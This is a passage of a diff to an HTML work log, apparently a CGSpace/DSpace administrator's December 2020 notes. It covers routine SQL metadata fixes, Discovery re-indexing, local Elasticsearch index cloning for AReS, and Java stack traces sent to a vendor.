<li>Since I was re-indexing Discovery anyways I decided to check for any uppercase AGROVOC and lowercase them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# BEGIN;
BEGIN
dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ &#39;[[:upper:]]&#39;;
UPDATE 406
dspace=# COMMIT;
COMMIT
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# BEGIN;
</span></span><span style="display:flex;"><span>BEGIN
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ &#39;[[:upper:]]&#39;;
</span></span><span style="display:flex;"><span>UPDATE 406
</span></span><span style="display:flex;"><span>dspace=# COMMIT;
</span></span><span style="display:flex;"><span>COMMIT
</span></span></code></pre></div><ul>
<li>I also updated the Font Awesome icon classes for version 5 syntax:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# BEGIN;
dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;fa fa-rss&#39;,&#39;fas fa-rss&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;%fa fa-rss%&#39;;
UPDATE 74
dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;fa fa-at&#39;,&#39;fas fa-at&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;%fa fa-at%&#39;;
UPDATE 74
dspace=# COMMIT;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# BEGIN;
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;fa fa-rss&#39;,&#39;fas fa-rss&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;%fa fa-rss%&#39;;
</span></span><span style="display:flex;"><span>UPDATE 74
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;fa fa-at&#39;,&#39;fas fa-at&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;%fa fa-at%&#39;;
</span></span><span style="display:flex;"><span>UPDATE 74
</span></span><span style="display:flex;"><span>dspace=# COMMIT;
</span></span></code></pre></div><ul>
<li>Then I started a full Discovery re-index:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34;</span>
$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 265m11.224s
user 171m29.141s
sys 2m41.097s
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34;</span>
</span></span><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 265m11.224s
</span></span><span style="display:flex;"><span>user 171m29.141s
</span></span><span style="display:flex;"><span>sys 2m41.097s
</span></span></code></pre></div><ul>
<li>Udana sent a report that the WLE approver is experiencing the same issue Peter highlighted a few weeks ago: they are unable to save metadata edits in the workflow</li>
<li>Yesterday Atmire responded about the owningComm and owningColl duplicates in Solr saying they didn&rsquo;t see any anymore&hellip;
<ul>
@ -544,31 +544,31 @@ sys 2m41.097s
<ul>
<li>After the Discovery re-indexing finished on CGSpace I prepared to start re-harvesting AReS by making sure the <code>openrxv-items-temp</code> index was empty and that the backup index I made yesterday was still there:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
{
&#34;acknowledged&#34; : true
}
$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 0,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2020-12-14/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 99992,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><h2 id="2020-12-16">2020-12-16</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;acknowledged&#34; : true
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2020-12-14/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 99992,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><h2 id="2020-12-16">2020-12-16</h2>
<ul>
<li>The harvesting on AReS finished last night so this morning I manually cloned the <code>openrxv-items-temp</code> index to <code>openrxv-items</code>
<ul>
@ -576,32 +576,32 @@ $ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100046,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items?pretty&#39;</span>
$ curl -s -X POST <span style="color:#e6db74">&#34;http://localhost:9200/openrxv-items-temp/_clone/openrxv-items?pretty&#34;</span>
$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100046,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100046,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items?pretty&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#34;http://localhost:9200/openrxv-items-temp/_clone/openrxv-items?pretty&#34;</span>
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100046,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
</span></span></code></pre></div><ul>
<li>Interestingly <a href="https://hdl.handle.net/10568/110447">the item</a> that we noticed was duplicated now only appears once</li>
<li>The <a href="https://hdl.handle.net/10568/110133">missing item</a> is still missing</li>
<li>Jane Poole noticed that the &ldquo;previous page&rdquo; and &ldquo;next page&rdquo; buttons are not working on AReS
@ -611,24 +611,24 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</li>
<li>Generate a list of submitters and approvers active in the last months using the Provenance field on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -h localhost -U postgres dspace -c <span style="color:#e6db74">&#34;SELECT text_value FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ &#39;^.*on 2020-(06|07|08|09|10|11|12)-*&#39;&#34;</span> &gt; /tmp/provenance.txt
$ grep -o -E <span style="color:#e6db74">&#39;by .*)&#39;</span> /tmp/provenance.txt | grep -v -E <span style="color:#e6db74">&#34;( on |checksum)&#34;</span> | sed -e <span style="color:#e6db74">&#39;s/by //&#39;</span> -e <span style="color:#e6db74">&#39;s/ (/,/&#39;</span> -e <span style="color:#e6db74">&#39;s/)//&#39;</span> | sort | uniq &gt; /tmp/recent-submitters-approvers.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -h localhost -U postgres dspace -c <span style="color:#e6db74">&#34;SELECT text_value FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ &#39;^.*on 2020-(06|07|08|09|10|11|12)-*&#39;&#34;</span> &gt; /tmp/provenance.txt
</span></span><span style="display:flex;"><span>$ grep -o -E <span style="color:#e6db74">&#39;by .*)&#39;</span> /tmp/provenance.txt | grep -v -E <span style="color:#e6db74">&#34;( on |checksum)&#34;</span> | sed -e <span style="color:#e6db74">&#39;s/by //&#39;</span> -e <span style="color:#e6db74">&#39;s/ (/,/&#39;</span> -e <span style="color:#e6db74">&#39;s/)//&#39;</span> | sort | uniq &gt; /tmp/recent-submitters-approvers.csv
</span></span></code></pre></div><ul>
<li>Peter wanted it to send some mail to the users&hellip;</li>
</ul>
<h2 id="2020-12-17">2020-12-17</h2>
<ul>
<li>I see some errors from CUA in our Tomcat logs:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">Thu Dec 17 07:35:27 CET 2020 | Query:containerItem:b049326a-0e76-45a8-ac0c-d8ec043a50c6
Error while updating
java.lang.UnsupportedOperationException: Multiple update components target the same field:solr_update_time_stamp
at com.atmire.dspace.cua.CUASolrLoggerServiceImpl$5.visit(SourceFile:1155)
at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.visitEachStatisticShard(SourceFile:241)
at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1140)
at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1129)
...
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Thu Dec 17 07:35:27 CET 2020 | Query:containerItem:b049326a-0e76-45a8-ac0c-d8ec043a50c6
</span></span><span style="display:flex;"><span>Error while updating
</span></span><span style="display:flex;"><span>java.lang.UnsupportedOperationException: Multiple update components target the same field:solr_update_time_stamp
</span></span><span style="display:flex;"><span> at com.atmire.dspace.cua.CUASolrLoggerServiceImpl$5.visit(SourceFile:1155)
</span></span><span style="display:flex;"><span> at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.visitEachStatisticShard(SourceFile:241)
</span></span><span style="display:flex;"><span> at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1140)
</span></span><span style="display:flex;"><span> at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1129)
</span></span><span style="display:flex;"><span>...
</span></span></code></pre></div><ul>
<li>I sent the full stack to Atmire to investigate
<ul>
<li>I know we&rsquo;ve had this &ldquo;Multiple update components target the same field&rdquo; error in the past with DSpace 5.x and Atmire said it was harmless, but would nevertheless be fixed in a future update</li>
@ -636,39 +636,39 @@ java.lang.UnsupportedOperationException: Multiple update components target the s
</li>
<li>I was trying to export the ILRI community on CGSpace so I could update one of the ILRI author&rsquo;s names, but it throws an error&hellip;</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace metadata-export -i 10568/1 -f /tmp/2020-12-17-ILRI.csv
Loading @mire database changes for module MQM
Changes have been processed
Exporting community &#39;International Livestock Research Institute (ILRI)&#39; (10568/1)
Exception: null
java.lang.NullPointerException
at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
at com.google.common.collect.Iterators.concat(Iterators.java:464)
at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
at org.dspace.app.bulkedit.MetadataExport.&lt;init&gt;(MetadataExport.java:77)
at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace metadata-export -i 10568/1 -f /tmp/2020-12-17-ILRI.csv
</span></span><span style="display:flex;"><span>Loading @mire database changes for module MQM
</span></span><span style="display:flex;"><span>Changes have been processed
</span></span><span style="display:flex;"><span>Exporting community &#39;International Livestock Research Institute (ILRI)&#39; (10568/1)
</span></span><span style="display:flex;"><span> Exception: null
</span></span><span style="display:flex;"><span>java.lang.NullPointerException
</span></span><span style="display:flex;"><span> at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
</span></span><span style="display:flex;"><span> at com.google.common.collect.Iterators.concat(Iterators.java:464)
</span></span><span style="display:flex;"><span> at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
</span></span><span style="display:flex;"><span> at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
</span></span><span style="display:flex;"><span> at org.dspace.app.bulkedit.MetadataExport.&lt;init&gt;(MetadataExport.java:77)
</span></span><span style="display:flex;"><span> at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
</span></span><span style="display:flex;"><span> at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
</span></span><span style="display:flex;"><span> at java.lang.reflect.Method.invoke(Method.java:498)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</span></span></code></pre></div><ul>
<li>I did it via CSV with <code>fix-metadata-values.py</code> instead:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2020-12-17-update-ILRI-author.csv
dc.contributor.author,correct
&#34;Padmakumar, V.P.&#34;,&#34;Varijakshapanicker, Padmakumar&#34;
$ ./fix-metadata-values.py -i 2020-12-17-update-ILRI-author.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">3</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2020-12-17-update-ILRI-author.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,correct
</span></span><span style="display:flex;"><span>&#34;Padmakumar, V.P.&#34;,&#34;Varijakshapanicker, Padmakumar&#34;
</span></span><span style="display:flex;"><span>$ ./fix-metadata-values.py -i 2020-12-17-update-ILRI-author.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">3</span>
</span></span></code></pre></div><ul>
<li>Abenet needed a list of all 2020 outputs from the Livestock CRP that were Limited Access
<ul>
<li>I exported the community from CGSpace and used <code>csvcut</code> and <code>csvgrep</code> to get a list:</li>
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c 'dc.identifier.citation[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dc.date.issued,dc.date.issued[],dc.date.issued[en_US],cg.identifier.status[en_US]' ~/Downloads/10568-80099.csv | csvgrep -c 'cg.identifier.status[en_US]' -m 'Limited Access' | csvgrep -c 'dc.date.issued' -m 2020 -c 'dc.date.issued[]' -m 2020 -c 'dc.date.issued[en_US]' -m 2020 &gt; /tmp/limited-2020.csv
<pre tabindex="0"><code>$ csvcut -c &#39;dc.identifier.citation[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dc.date.issued,dc.date.issued[],dc.date.issued[en_US],cg.identifier.status[en_US]&#39; ~/Downloads/10568-80099.csv | csvgrep -c &#39;cg.identifier.status[en_US]&#39; -m &#39;Limited Access&#39; | csvgrep -c &#39;dc.date.issued&#39; -m 2020 -c &#39;dc.date.issued[]&#39; -m 2020 -c &#39;dc.date.issued[en_US]&#39; -m 2020 &gt; /tmp/limited-2020.csv
</code></pre><h2 id="2020-12-18">2020-12-18</h2>
<ul>
<li>I added support for indexing community views and downloads to <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a>
@ -689,43 +689,43 @@ $ ./fix-metadata-values.py -i 2020-12-17-update-ILRI-author.csv -db dspace -u ds
<ul>
<li>The DeduplicateValuesProcessor has been running on DSpace Test since two days ago and it almost completed its second twelve-hour run, but crashed near the end:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">...
Run 1 — 100% — 8,230,000/8,239,228 docs — 39s — 9h 8m 31s
Exception: Java heap space
java.lang.OutOfMemoryError: Java heap space
at java.util.Arrays.copyOfRange(Arrays.java:3664)
at java.lang.String.&lt;init&gt;(String.java:207)
at org.noggit.CharArr.toString(CharArr.java:164)
at org.apache.solr.common.util.JavaBinCodec.readStr(JavaBinCodec.java:599)
at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:180)
at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
at org.apache.solr.common.util.JavaBinCodec.readSolrDocument(JavaBinCodec.java:360)
at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:219)
at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
at org.apache.solr.common.util.JavaBinCodec.readSolrDocumentList(JavaBinCodec.java:374)
at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:221)
at org.apache.solr.common.util.JavaBinCodec.readOrderedMap(JavaBinCodec.java:125)
at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:188)
at org.apache.solr.common.util.JavaBinCodec.unmarshal(JavaBinCodec.java:116)
at org.apache.solr.client.solrj.impl.BinaryResponseParser.processResponse(BinaryResponseParser.java:43)
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:528)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
at org.apache.solr.client.solrj.request.QueryRequest.process(QueryRequest.java:91)
at org.apache.solr.client.solrj.SolrServer.query(SolrServer.java:301)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.getNextSetOfSolrDocuments(SourceFile:392)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:157)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>Run 1 — 100% — 8,230,000/8,239,228 docs — 39s — 9h 8m 31s
</span></span><span style="display:flex;"><span>Exception: Java heap space
</span></span><span style="display:flex;"><span>java.lang.OutOfMemoryError: Java heap space
</span></span><span style="display:flex;"><span> at java.util.Arrays.copyOfRange(Arrays.java:3664)
</span></span><span style="display:flex;"><span> at java.lang.String.&lt;init&gt;(String.java:207)
</span></span><span style="display:flex;"><span> at org.noggit.CharArr.toString(CharArr.java:164)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readStr(JavaBinCodec.java:599)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:180)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readSolrDocument(JavaBinCodec.java:360)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:219)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readSolrDocumentList(JavaBinCodec.java:374)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:221)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readOrderedMap(JavaBinCodec.java:125)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:188)
</span></span><span style="display:flex;"><span> at org.apache.solr.common.util.JavaBinCodec.unmarshal(JavaBinCodec.java:116)
</span></span><span style="display:flex;"><span> at org.apache.solr.client.solrj.impl.BinaryResponseParser.processResponse(BinaryResponseParser.java:43)
</span></span><span style="display:flex;"><span> at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:528)
</span></span><span style="display:flex;"><span> at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
</span></span><span style="display:flex;"><span> at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
</span></span><span style="display:flex;"><span> at org.apache.solr.client.solrj.request.QueryRequest.process(QueryRequest.java:91)
</span></span><span style="display:flex;"><span> at org.apache.solr.client.solrj.SolrServer.query(SolrServer.java:301)
</span></span><span style="display:flex;"><span> at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.getNextSetOfSolrDocuments(SourceFile:392)
</span></span><span style="display:flex;"><span> at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:157)
</span></span><span style="display:flex;"><span> at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
</span></span><span style="display:flex;"><span> at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
